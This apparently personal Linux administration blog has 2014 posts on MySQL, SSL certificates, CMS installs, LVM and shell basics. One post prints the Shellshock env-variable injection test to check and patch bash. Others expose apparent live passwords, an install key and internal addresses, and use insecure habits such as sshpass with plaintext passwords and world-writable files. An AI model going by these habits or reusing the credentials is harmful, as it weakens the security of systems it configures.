Website logs: /usr/local/apache/domlogs/ (use this to find sites with traffic in the last 60 seconds: find -maxdepth 1 -type f -mmin -1 | egrep -v 'offset|_log$')
cron logs: /var/log/cron

Ref :
http://forums.cpanel.net/f5/troubleshooting-high-server-loads-linux-servers-319352.html
http://www.linuxjournal.com/magazine/hack-and-linux-troubleshooting-part-i-high-load?page=0,0

Tuesday, 16 December 2014

A foreign key constraint fails in MySQL

Scenario:

drop database databasename;
ERROR 1217 (23000): Cannot delete or update a parent row: a foreign key constraint fails

Resolution:-

mysql> SET FOREIGN_KEY_CHECKS=0;
Query OK, 0 rows affected (0.00 sec)

mysql> drop database databasename;
Query OK, 2 rows affected (0.06 sec)

mysql> SET FOREIGN_KEY_CHECKS=1;
Query OK, 0 rows affected (0.00 sec)

Ref : - http://stackoverflow.com/questions/3334619/cannot-delete-or-update-a-parent-row-a-foreign-key-constraint-fails

Thursday, 4 December 2014

Could not chdir to home directory : Permission denied

Scenario:
While do ssh to the server,

login as: usrteam
eduteam@67.228.160.50's password:
Last login: Thu Dec 4 09:59:52 2014 from 14.141.35.194
Could not chdir to home directory /home/usrteam: Permission denied
-bash: /home/eduteam/.bash_profile: Permission denied
-bash-3.2$ pwd
/

Resolution :-

chown -R usrteam /home/usrteam
You have new mail in /var/spool/mail/root

Thursday, 27 November 2014

Couchbase Server

Couchbase Server is the world’s most complete, scalable, and highest performing NoSQL distributed database.

yum install -y pkgconfig

yum install openssl098e

wget http://packages.couchbase.com/releases/3.0.1/couchbase-server-enterprise-3.0.1-centos6.x86_64.rpm

rpm -ivh couchbase-server-enterprise-3.0.1-centos6.x86_64.rpm
Preparing... ########################################### [100%]
Warning: Transparent hugepages may be used. To disable the usage
of transparent hugepages, set the kernel settings at runtime with
echo never > /sys/kernel/mm/transparent_hugepage/enabled
Warning: Transparent hugepages may be used. To disable the usage
of transparent hugepages, set the kernel settings at runtime with
echo never > /sys/kernel/mm/redhat_transparent_hugepage/enabled
Warning: Swappiness is not 0.
You can set the swappiness at runtime with
sysctl vm.swappiness=0
Minimum RAM required : 4 GB
System RAM configured : 3.74 GB

Minimum number of processors required : 4 cores
Number of processors on the system : 2 cores

1:couchbase-server ########################################### [100%]
Starting couchbase-server[ OK ]

You have successfully installed Couchbase Server.
Please browse to http://mb1udarmiweb02.pearsontc.com:8091/ to configure your server.
Please refer to http://couchbase.com for additional resources.

Please note that you have to update your firewall configuration to
allow connections to the following ports: 11211, 11210, 11209, 4369,
8091, 8092, 18091, 18092, 11214, 11215 and from 21100 to 21299.

By using this software you agree to the End User License Agreement.
See /opt/couchbase/LICENSE.txt.

/etc/init.d/couchbase-server status
couchbase-server is running

Ref:
http://www.couchbase.com/nosql-databases/about-couchbase-server#ElasticScalability
http://docs.couchbase.com/couchbase-manual-2.5/cb-install/

Update time zone in Linux

date
Thu Nov 27 19:40:33 EST 2014

ls -l /etc/localtime
lrwxrwxrwx 1 root root 39 Nov 27 19:40 /etc/localtime -> /usr/share/zoneinfo/Australia/Melbourne

unlink /etc/localtime

ln -s /usr/share/zoneinfo/Asia/Kolkata /etc/localtime

ls -l /etc/localtime
lrwxrwxrwx 1 root root 32 Nov 27 14:08 /etc/localtime -> /usr/share/zoneinfo/Asia/Kolkata

date
Thu Nov 27 14:09:15 IST 2014

Ref:- http://www.linuxnix.com/2014/11/linuxunix-how-update-timezone-in-a-system.html?utm_source=feedburner&utm_medium=email&utm_campaign=Feed%3A+TheLinuxJuggernaut+%28The+Linux+Juggernaut%29

Wednesday, 19 November 2014

PHP Warning: PHP Startup: Unable to load dynamic library

Scenario :-

php -v

PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib64/php/modules/module.so' - /usr/lib64/php/modules/module.so: cannot open shared object file: No such file or directory in Unknown on line 0
PHP 5.3.3 (cli) (built: Sep 10 2014 05:27:26)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies

cat /etc/php.d/mcrypt.ini
; Enable mcrypt extension module
extension=module.so

but module.so not exist in /usr/lib64/php/modules/

Resolution :-
uninstall the php-mcrypt and reinstall the suitable rpm

rpm -e php-mcrypt-5.3.3-1.el6.rf.x86_64
wget ftp://ftp.pbone.net/mirror/download.fedora.redhat.com/pub/fedora/epel/6/x86_64/php-mcrypt-5.3.3-3.el6.x86_64.rpm
rpm -ivh php-mcrypt-5.3.3-3.el6.x86_64.rpm

php -v
PHP 5.3.3 (cli) (built: Sep 10 2014 05:27:26)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies

cat /etc/php.d/mcrypt.ini
; Enable mcrypt extension module
extension=mcrypt.so

now mcrypt.so exist in /usr/lib64/php/modules/mcrypt.so

Monitor MySQL performance with innotop

Innotop is an excellent command line program, similar to ‘top command‘ to monitor local and remote MySQL servers running under InnoDB engine.

yum install innotop

innotop -u root -p 'mysqlpassword'

Innotop Help
Press “?” to get the summary of command line options and usage.

Switch to a different mode:
A Dashboard I InnoDB I/O Info Q Query List
B InnoDB Buffers K InnoDB Lock Waits R InnoDB Row Ops
C Command Summary L Locks S Variables & Status
D InnoDB Deadlocks M Replication Status T InnoDB Txns
F InnoDB FK Err O Open Tables U User Statistics

Actions:
d Change refresh interval p Pause innotop
k Kill a query's connection q Quit innotop
n Switch to the next connection x Kill a query

Other:
TAB Switch to the next server group / Quickly filter what you see
! Show license and warranty = Toggle aggregation
# Select/create server groups @ Select/create server connections
$ Edit configuration settings \ Clear quick-filters
Press any key to continue

Non-Interactively

innotop -u root -p 'mysqlpassword' --count 5 -d 1 -n

Monitor Remote Database

innotop -u username -p password -h hostname

Ref : -
http://www.tecmint.com/install-innotop-to-monitor-mysql-server-performance/
http://linux.die.net/man/1/innotop

Wednesday, 22 October 2014

SeaLion Monitoring in Linux

Install and configure SeaLion

wget https://s3.amazonaws.com/sealion.com/3.2.3/sealion-agent-3.2.3-noarch.tar.gz
tar -xzvf sealion-agent-3.2.3-noarch.tar.gz
cd sealion-agent

sudo ./install.sh -o 299ade98-ab92-44bd-a9e6-3cefd1a9aeda

dependency : SeaLion agent requires python version 2.6 or above

Ref : -
https://www.youtube.com/watch?v=fLqVQd1SMmY
https://sealion.com

Monday, 29 September 2014

Bash Code Injection Vulnerability

rpm -qa | grep bash

bash-3.2-32.el5

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
You have new mail in /var/spool/mail/root

yum upgrade bash

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'

rpm -qa | grep bash
bash-3.2-33.el5.1

Ref :- https://access.redhat.com/articles/1200223

Wednesday, 24 September 2014

Install mod_ssl on Apache2 - Ubuntu

Steps to install mod_ssl on Apache2 - Ubuntu

apt-get install mod_ssl

dpkg -S mod_ssl.so
apache2.2-bin: /usr/lib/apache2/modules/mod_ssl.so

a2enmod ssl
Module ssl already enabled

To make sure that the SSL module was loaded properly :

apache2ctl -t -D DUMP_MODULES | grep ssl
[Thu Sep 25 11:28:16 2014] [warn] NameVirtualHost *:80 has no VirtualHosts
Syntax OK
ssl_module (shared)

Mutual SSL authentication in Ubuntu

Two-way SSL using CA certificates

cd /root

mkdir CA

cd CA

mkdir newcerts private

vi openssl.cnf

#
# OpenSSL configuration file.
#
# Establish working directory.
dir = .
ts = 1024 # Size of keys
default_keyfile = key.pem # name of generated keys
default_md = md5 # message digest algorithm
string_mask = nombstr # permitted characters
distinguished_name = req_distinguished_name
req_extensions = v3_req

[ ca ]

default_ca = CA_default

[ CA_default ]

serial = $dir/serial
database = $dir/index.txt
new_certs_dir = $dir/newcerts
certificate = $dir/cacert.pem
private_key = $dir/private/cakey.pem
default_days = 365
default_md = md5
preserve = no
email_in_dn = no
nameopt = default_ca
certopt = default_ca
policy = policy_match

[ policy_match ]

countryName = match
stateOrProvinceName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

[ req ]

default_md = sha1
distinguished_name = req_distinguished_name

[ req_distinguished_name ]

countryName = Country
countryName_default = IN
countryName_min = 2
countryName_max = 2
localityName = Locality
stateOrProvinceName_default = Karnataka
localityName_default = Bangalore
organizationName = Organization
organizationName_default = edurite
commonName = Common Name
commonName_max = 64

[ certauth ]

subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer:always
basicConstraints = CA:true

[ server ]

basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment, dataEncipherment
extendedKeyUsage = serverAuth
nsCertType = server

[ client ]

basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment, dataEncipherment
extendedKeyUsage = clientAuth
nsCertType = client

[ v3_req ]

basicConstraints = CA:FALSE
subjectKeyIdentifier = hash

Generate self-signed certificate

openssl req -config ./openssl.cnf -newkey rsa:2048 -nodes -keyform PEM -keyout ca.key -x509 -days 3650 -extensions certauth -outform PEM -out ca.cer

openssl genrsa -out server.key 2048

openssl req -config ./openssl.cnf -new -key server.key -out server.req

openssl x509 -req -in server.req -CA ca.cer -CAkey ca.key -set_serial 100 -extfile openssl.cnf -extensions server -days 365 -outform PEM -out server.cer

rm server.req

openssl genrsa -out client.key 2048

openssl req -config ./openssl.cnf -new -key client.key -out client.req

openssl x509 -req -in client.req -CA ca.cer -CAkey ca.key -set_serial 101 -extfile openssl.cnf -extensions client -days 365 -outform PEM -out client.cer

openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12

rm client.key client.cer client.req

vi /etc/apache2/sites-available/default

<VirtualHost *:443>
ServerAdmin webmaster@localhost
ServerName 10.98.33.136:443

DocumentRoot /var/www
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
</Directory>

ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>

ErrorLog ${APACHE_LOG_DIR}/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn

CustomLog ${APACHE_LOG_DIR}/access.log combined

Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>
SSLEngine on
LogLevel warn
SSLProtocol all -SSLv2
SSLCipherSuite HIGH:MEDIUM
SSLVerifyClient require
SSLVerifyDepth 10
SSLCertificateFile /etc/apache2/ssl/apache.crt
SSLCertificateKeyFile /etc/apache2/ssl/apache.key
#SSLCACertificateFile /etc/apache2/ssl/ca.cer
</VirtualHost>

/etc/init.d/apache2 restart

./OpenSSL_Client rname@some.com 365 passwd /var/www/html/CERT

Now Import the P12 file to the browser.

Ref :- http://www.flatmtn.com/article/setting-openssl-create-certificates

Tuesday, 23 September 2014

Two-way SSL authentication

Two-way SSL authentication or mutual SSL authentication or client
authentication works by resolving its identity to SSL server with a use of
the client certificate.

All certificates will be issued by using OpenSSL application and openssl.cnf
configuration file.

cd /root

mkdir CA

cd CA

mkdir newcerts private

vi /root/CA/openssl.cnf

#
# OpenSSL configuration file.
#
# Establish working directory.
dir = .
ts = 1024 # Size of keys
default_keyfile = key.pem # name of generated keys
default_md = md5 # message digest algorithm
string_mask = nombstr # permitted characters
distinguished_name = req_distinguished_name
req_extensions = v3_req

[ ca ]

default_ca = CA_default

[ CA_default ]

serial = $dir/serial
database = $dir/index.txt
new_certs_dir = $dir/newcerts
certificate = $dir/cacert.pem
private_key = $dir/private/cakey.pem
default_days = 365
default_md = md5
preserve = no
email_in_dn = no
nameopt = default_ca
certopt = default_ca
policy = policy_match

[ policy_match ]

countryName = match
stateOrProvinceName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

[ req ]

default_md = sha1
distinguished_name = req_distinguished_name

[ req_distinguished_name ]

countryName = Country
countryName_default = IN
countryName_min = 2
countryName_max = 2
localityName = Locality
stateOrProvinceName_default = Karnataka
localityName_default = Bangalore
organizationName = Organization
organizationName_default = edurite
commonName = Common Name
commonName_max = 64

[ certauth ]

subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer:always
basicConstraints = CA:true

[ server ]

basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment, dataEncipherment
extendedKeyUsage = serverAuth
nsCertType = server

[ client ]

basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment, dataEncipherment
extendedKeyUsage = clientAuth
nsCertType = client

[ v3_req ]

basicConstraints = CA:FALSE
subjectKeyIdentifier = hash

echo '01' > serial
touch index.txt

to generate self-signed certificate

openssl req -config ./openssl.cnf -newkey rsa:2048 -nodes -keyform PEM -keyout ca.key -x509 -days 3650 -extensions certauth -outform PEM -out ca.cer

openssl genrsa -out server.key 2048

openssl req -config ./openssl.cnf -new -key server.key -out server.req

openssl x509 -req -in server.req -CA ca.cer -CAkey ca.key -set_serial 100 -extfile openssl.cnf -extensions server -days 365 -outform PEM -out server.cer

rm server.req

openssl genrsa -out client.key 2048

openssl req -config ./openssl.cnf -new -key client.key -out client.req

openssl x509 -req -in client.req -CA ca.cer -CAkey ca.key -set_serial 101 -extfile openssl.cnf -extensions client -days 365 -outform PEM -out client.cer

openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12

rm client.key client.cer client.req

vi /etc/httpd/conf.d/ssl.conf

LoadModule ssl_module modules/mod_ssl.so
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl .crl

Listen 443

<VirtualHost 172.16.0.14:443>
DocumentRoot "/var/www/SSL/digitally"
CheckSpelling on
DirectoryIndex opsindex.php
ServerName 172.16.0.14
ServerAdmin root@localhost
ErrorLog logs/ssl_error_log
TransferLog logs/ssl_access_log
LogLevel warn
SSLEngine on
SSLProtocol all -SSLv2
SSLCipherSuite HIGH:MEDIUM
SSLCertificateFile /etc/httpd/conf/ssl/server.cer
SSLCertificateKeyFile /etc/httpd/conf/ssl/server.key
SSLVerifyClient require
SSLVerifyDepth 10
SSLCACertificateFile /etc/httpd/conf/ssl/ca.cer
<Files ~ "\.(cgi|shtml|phtml|php3?)$">
SSLOptions +StdEnvVars
</Files>
SetEnvIf User-Agent ".*MSIE.*" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
CustomLog logs/ssl_request_log \
"%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
</VirtualHost>

httpd -S

/etc/init.d/httpd/restart

mkdir -p /var/www/html/CERTS

./OpenSSL_Client rname@some.com 365 passwd /var/www/html/CERTS

Now Import the P12 file to the browser.

Ref :- http://www.flatmtn.com/article/setting-openssl-create-certificates

Thursday, 11 September 2014

Purge logs of MySQL

The PURGE BINARY LOGS statement deletes all the binary log files listed in the log index file prior to the specified log file name or date. BINARY and MASTER are synonyms. Deleted log files also are removed from the list recorded in the index file, so that the given log file becomes the first in the list.

Examples:-

mysql> SHOW BINARY LOGS;
+------------------+-----------+
| Log_name | File_size |
+------------------+-----------+
| mysql-bin.000034 | 14785707 |
| mysql-bin.000035 | 143 |
| mysql-bin.000036 | 143 |
| mysql-bin.000037 | 120 |
+------------------+-----------+
4 rows in set (0.00 sec)

mysql> PURGE BINARY LOGS BEFORE '2014-09-10';

mysql> PURGE BINARY LOGS BEFORE '2013-04-22 09:55:22';

mysql>PURGE BINARY LOGS TO 'mysql-bin.000015';

ref : https://mariadb.com/kb/en/mariadb/documentation/sql-commands/administration-commands/sql-commands-purge-logs/

Sunday, 24 August 2014

rsync without prompt for password

Do rsync without prompt for password, useful for cronjob and scripting.

sshpass -p "password" Source-path Destination-path

example:-
sshpass -p "mypassword" rsync -avzpW --recursive root@10.11.11.10:/data/testdata /data/

Friday, 22 August 2014

SSL Certificate on Ubuntu Server

Install SSL Certificate on Ubuntu Server

sudo apt-get install apache2
ifconfig
brose 10.98.33.136
It works!

a2enmod ssl

service apache2 restart

mkdir /etc/apache2/ssl

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/apache.key -out /etc/apache2/ssl/apache.crt

Country Name (2 letter code) [AU]:IN
State or Province Name (full name) [Some-State]:KA
Locality Name (eg, city) []:Bangalore
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Pearson
Organizational Unit Name (eg, section) []:Pearson
Common Name (e.g. server FQDN or YOUR name) []:10.98.33.136
Email Address []:jojan.paul@pearson.com

vi /etc/apache2/sites-available/default

<VirtualHost *:443>
ServerAdmin webmaster@localhost
ServerName 10.98.33.136:443
--------------
--------------
SSLEngine on
SSLCertificateFile /etc/apache2/ssl/apache.crt
SSLCertificateKeyFile /etc/apache2/ssl/apache.key
</VirtualHost>

Service apache2 restart

brose 10.98.33.136

It will prompt for This Connection is Untrusted and follow, I Understand the Risks-Add Exception-On Add Security-Exception window-Confirm Security Exception

It works!

Ref: https://www.digitalocean.com/community/tutorials/how-to-create-a-ssl-certificate-on-apache-for-ubuntu-14-04

Remove the apache2 in Ubuntu

To remove the apache2 service using Terminal:

First stop the apache2 service if it is running with:

sudo service apache2 stop

Now remove and cleanup all the apache2 packages with:

sudo apt-get purge apache2 apache2-utils apache2.2-bin apache2-common

run in case any other cleanup in needed

sudo apt-get autoremove

You can do the following two tests to confirm apache has been removed:

which apache2
- should return a blank line

sudo service apache2 start
apache2: unrecognized service

Installing WordPress Apache on RHEL

Download WordPress for apache
wget http://wordpress.org/latest.tar.gz

tar -xvzf latest.tar.gz -C /data

Configure MySQL Database

Connect to MySQL Server & Enter Password
mysql -u root -p
Enter password:

Creating New User for WordPress Database

CREATE USER wordpress@localhost IDENTIFIED BY "your_password_here";

Create New Database
create database wordpress;

Grant Privileges to Database
GRANT ALL ON wordpress.* TO wordpress@localhost;

FLUSH privileges
FLUSH PRIVILEGES;

exit

Configure Apache VirtualHost

vi /etc/httpd/conf/httpd.conf

<VirtualHost 10.33.68.27:80>
ServerAdmin test@test.com
DocumentRoot /data/wordpress
ServerName www.wordpresstest.com
<Directory /data/wordpress>
Options FollowSymLinks
AllowOverride ALL
</Directory>
</VirtualHost>

service httpd restart

vi /etc/hosts

127.0.0.1 wordpress

Configuring WordPress

cd /data/wordpress
cp wp-config-sample.php wp-config.php

vi wp-config.php

/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'wordpressuser');

/** MySQL database password */
define('DB_PASSWORD', 'Pearson1');

/** MySQL hostname */
define('DB_HOST', '10.161.141.36');

Open your browser and type any of the following address.

http://wordpress/
http://localhost
http://your-ip

Ref: http://www.tecmint.com/install-wordpress-using-lamp-or-lemp-on-rhel-centos-fedora/

Tuesday, 15 July 2014

Install Drupal 7 on Linux

Install the PHP 5.3.3 and Apache 2.2.15,

restart your apache server:
/etc/init.d/httpd restart

To function Drupal properly with apache and php

vi /etc/httpd/conf/httpd.conf
AddType application/x-httpd-php .html

vi /data/testphp.php
and enter this then save :

<?php
phpinfo();
?>

restart your apache server:

/etc/init.d/httpd restart

Configure Mysql to work with Drupal

Install MySQL-5.6

mysql -u root -p
mysql> CREATE DATABASE drupal;
mysql> CREATE USER drupaluser@localhost;
mysql> SET PASSWORD FOR drupaluser@localhost= PASSWORD('typepasswordhere');
mysql> GRANT ALL PRIVILEGES ON drupal.* TO drupaluser@localhost IDENTIFIED BY 'password';
mysql> quit

Finally lets start with Drupal

Get the latest package here : http://drupal.org/project/drupal

Copy the file to /data
and unpack it by typing :

tar -xvzf drupal-7.28.tar.gz
cd drupal-7.28
chmod a+w sites/default
cd sites/default
cp default.settings.php settings.php
chmod a+w settings.php
mkdir files
chmod a+w files

vi /etc/httpd/conf.d/vhost

<VirtualHost 10.10.xx.xxx:80>
ServerName www.testsite.com
ServerAlias testsite.com
DocumentRoot "/data/drupal"
DirectoryIndex index.php
<Directory "/data/drupal">
AllowOverride All
Allow from All
Options -Indexes
</Directory>
</VirtualHost>

/etc/init.d/httpd restart

Add an entry in C:\Windows\System32\drivers\etc\hosts
10.10.xx.xxx www.testsite.com

Open up browser and go to :
http://www.testsite.com/drupal-7.28
it will open up a Drupal page !

To prevent unwanted users working on them..

chmod go-w settings.php
chmod 757 files

Ref: http://altinukshini.wordpress.com/2011/01/09/how-to-install-drupal-7-on-linux/

Monday, 7 July 2014

Set Up Replication in MySQL

MySQL replication is a process that allows you to easily maintain multiple copies of MySQL data by having them copied automatically from the main-server to a Replica-server database. This can be helpful for many reasons including facilitating a backup for the data, a way to analyze it without using the main database, or simply as a means to scale out.

For the process to work you will need two IP addresses: one of the main-server and one of the Replica-server.

10.10.0.39- main-server Database
10.10.0.40- Replica-server Database

User with Sudo privileges and have MySQL installed.

rpm -qa | grep MySQL
MySQL-client-5.6.12-1.el6.x86_64
MySQL-server-5.6.12-1.el6.x86_64
MySQL-devel-5.6.12-1.el6.x86_64
MySQL-shared-compat-5.6.12-1.el6.x86_64
MySQL-shared-5.6.12-2.el6.x86_64

Configure the Main-Server Database

Open up the mysql configuration file

vi /etc/my.cnf
bind-address = 10.10.0.39
log_bin = /data/var/lib/mysql/mysql-bin.log
binlog_do_db = newdatabase
server-id=1

service mysql restart

Grant privileges to the slave.

mysql -u root -p

mysql> GRANT REPLICATION SLAVE ON *.* TO '10.10.0.40'@'%' IDENTIFIED BY 'IctdscayK4blr';
Query OK, 0 rows affected (0.00 sec)

mysql> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.00 sec)

mysql> USE newdatabase;
Database changed

mysql> FLUSH TABLES WITH READ LOCK;
Query OK, 0 rows affected (0.01 sec)

mysql> SHOW MASTER STATUS;
+------------------+----------+--------------+------------------+-------------------+
| File | Position | Binlog_Do_DB | Binlog_Ignore_DB | Executed_Gtid_Set |
+------------------+----------+--------------+------------------+-------------------+
| mysql-bin.000032 | 523 | newdatabase | | |
+------------------+----------+--------------+------------------+-------------------+
1 row in set (0.00 sec)

The File and Position details are required while configuring slave.

mysqldump -u root -p --opt newdatabase > newdatabase.sql

mysql> UNLOCK TABLES;

mysql> QUIT;

Configure the Replica-Server Database

mysql -u root -p

mysql> CREATE DATABASE newdatabase;

mysql> QUIT;

Import the database that you previously exported from the main-server database.

mysql -u root -p newdatabase < /path/to/newdatabase.sql

vi /etc/my.cnf
#Slave
relay-log = /data/var/lib/mysql/mysql-relay-bin.log
log_bin = /data/var/lib/mysql/mysql-bin.log
binlog_do_db = newdatabase
server-id=2

service mysql restart

Enable the replication from within the MySQL shell.

mysql -u root -p

mysql> CHANGE MASTER TO MASTER_HOST='10.10.0.39',MASTER_USER='root', MASTER_PASSWORD='IctdsdkMSK4blr', MASTER_LOG_FILE='mysql-bin.000001', MASTER_LOG_POS= 523;
Query OK, 0 rows affected 2 warnings (0.01 sec)

The above step designates, (1) the current server as the slave of our main server. (2) It provides the server the correct login credentials. (3) Last of all, it lets the slave server know where to start replicating from; the main-server log file and log position come from the numbers we wrote down previously.

mysql> START SLAVE;

mysql> SHOW SLAVE STATUS\G;

mysql> QUIT;

If there is an issue in connecting, you can try starting slave with a command to skip over it:

mysql> STOP SLAVE;

mysql> SET GLOBAL SQL_SLAVE_SKIP_COUNTER = 1;

mysql> START SLAVE;

Ref :- digitalocean.com

Friday, 20 June 2014

Remove LVM Partitions in Linux

vi /etc/fstab
remove the present lvm entry.

lvremove /dev/VGdata/LVdata
Do you really want to remove active logical volume LVdata? [y/n]: y
Logical volume "LVdata" successfully removed

vgremove VGdata
Volume group "VGdata" successfully removed

pvremove /dev/sdb1
Labels on physical volume "/dev/sdb1" successfully wiped

fdisk /dev/sdb

WARNING: DOS-compatible mode is deprecated. It's strongly recommended to
switch off the mode (command 'c') and change display units to
sectors (command 'u').

Command (m for help): p

Disk /dev/sdb: 26.8 GB, 26843545600 bytes
64 heads, 32 sectors/track, 25600 cylinders
Units = cylinders of 2048 * 512 = 1048576 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000b6891

Device Boot Start End Blocks Id System
/dev/sdb1 1 25600 26214384 8e Linux LVM

Command (m for help): d
Selected partition 1

Command (m for help): p

Disk /dev/sdb: 26.8 GB, 26843545600 bytes
64 heads, 32 sectors/track, 25600 cylinders
Units = cylinders of 2048 * 512 = 1048576 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000b6891

Device Boot Start End Blocks Id System

Command (m for help): w
The partition table has been altered!

Calling ioctl() to re-read partition table.
Syncing disks.
You have new mail in /var/spool/mail/root

partprobe
Warning: WARNING: the kernel failed to re-read the partition table on /dev/sda (Device or resource busy). As a result,

it may not reflect all of your changes until after reboot.

reboot

Broadcast message from arao9aj@mb1utarmiweb01.pearsontc.com
(/dev/pts/0) at 16:12 ...

The system is going down for reboot NOW!

Ref: http://www.linuxspy.com/1810/how-to-remove-lvm-partitions/

Change the default size of an inode

It is possible to define a non-standard sized inode by using the mke2fs tool with an undocumented option, -I. The size of the inode has to be a power of two and between the size of EXT2_GOOD_OLD_INODE_SIZE (128 bytes) and size of blocks in bytes. One reason for doing this could be that user is going to use extended attributes. Extended attributes are arbitrary name/value pairs used to store system objects like Access Control Lists (ACL). If the size of the inodes is larger than the default size, then sufficiently small attributes can be stored in inode

tune2fs -l /dev/mapper/VGdata-LVdata | grep Inode
Inode count: 1572864
Inodes per group: 8192
Inode blocks per group: 512
Inode size: 256

mke2fs -I 8192 /dev/mapper/VGdata-LVdata
mke2fs 1.41.12 (17-May-2010)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
1572864 inodes, 6291456 blocks
314572 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=4294967296
192 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000

Writing inode tables: done
Writing superblocks and filesystem accounting information: done

This filesystem will be automatically checked every 35 mounts or
180 days, whichever comes first. Use tune2fs -c or -i to override.

tune2fs -l /dev/mapper/VGdata-LVdata | grep Inode
Inode count: 3276800
Inodes per group: 16384
Inode blocks per group: 1024
Inode size: 256

Ref: http://magazine.redhat.com/2007/04/23/how-can-i-change-the-default-size-of-an-inode-when-i-create-an-ext2ext3-filesystem/

Wednesday, 11 June 2014

Commonly Used Shell Variables

echo $BASH_VERSION --holds the version of this instance of bash
3.2.25(1)-release

echo $HOSTNAME --the name of the your computer
LinuxHost

echo $CDPATH --the search path for the cd command

echo $HISTFILE --the file in which command history is saved
/root/.bash_history

echo $HISTFILESIZE --the maximum number of lines contained in the history file
1000

echo $HISTSIZE --the number of commands to remember in the command history
1000

echo $HOME --the home directory of the current user
/root

echo $IFS --the Internal Field Separator

echo $LANG --used to determine the lang

echo $PATH --the search path for commands
/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin

echo $PS1 --shows prompt settings
[\u@\h \W]\$

echo $TMOUT --the default timeout for the read builtin command

echo $TERM --the login terminal type
xterm
export TERM=vt100
export TERM=xterm

echo $SHELL --set path to login shell
/bin/bash

echo $DISPLAY --Set X display name
export DISPLAY=:0.1

export EDITOR=/usr/bin/vim --name of default text editor

Tuesday, 10 June 2014

Find out built in or an external command

type -a bind
bind is a shell builtin

type -a cat
cat is /bin/cat

type -a awk
awk is /bin/awk
awk is /usr/bin/awk

type -a true
true is a shell builtin
true is /bin/true

type -a select
select is a shell keyword

Basic Command Line Editing

Use the following key combinations to edit and recall commands:

• CTRL + L : Clear the screen.

• CTRL + W : Delete the word starting at cursor.

• CTRL + U : Clear the line i.e. Delete the all words from command line.

• Up and Down arrow keys : Recall commands (see command history).

• Tab : Auto-complete files, directory, command names and much more.

• CTRL + R : Search through previously used commands (see command history)

• CTRL + C : Cancel currently running commands.

• CTRL + T : Swap the last two characters before the cursor.

• ESC + T : Swap the last two words before the cursor.

Find out current shell

To find all of the available shells in your system,

echo $SHELL

/bin/bash

To find out your current shell,

which bash

/bin/bash

ps $$

PID TTY STAT TIME COMMAND
29893 pts/0 Ss 0:00 -bash

ps -p $$

PID TTY TIME CMD
29893 pts/0 00:00:00 bash

Valid login shells

cat /etc/shells

/bin/sh
/bin/bash
/sbin/nologin
/bin/tcsh
/bin/csh
/bin/ksh

Wednesday, 28 May 2014

Ways to check Linux OS is 32 bit or 64 Bit

uname -m

x86_64 ==> 64-bit kernel
i686 ==> 32-bit kernel

/bin/uname -m

x86_64 ==> 64-bit kernel
i686 ==> 32-bit kernel

getconf LONG_BIT

64 ==> 64-bit kernel
32 ==> 32-bit kernel

arch

x86_64 ==> 64-bit kernel
i686 ==> 32-bit kernel

file /sbin/init

/sbin/init: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, stripped ==> 64-bit kernel

/sbin/init: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.6.9, dynamically linked (uses shared libs), for GNU/Linux 2.6.9, stripped ==> 32-bit kernel

In Ubuntu

dpkg --print-architecture

amd64 ==> 64-bit kernel
amd32 ==> 32-bit kernel

Ref: http://stackoverflow.com/questions/246007/how-to-determine-whether-a-given-linux-is-32-bit-or-64-bit

Tuesday, 27 May 2014

Change Run Levels in Linux

Find Out Current Run Level

who -r
run-level 3 2014-05-27 17:04

Or

runlevel
N 3

Use the init command to change rune levels:

init 1

To change the default run level:

vi /etc/inittab
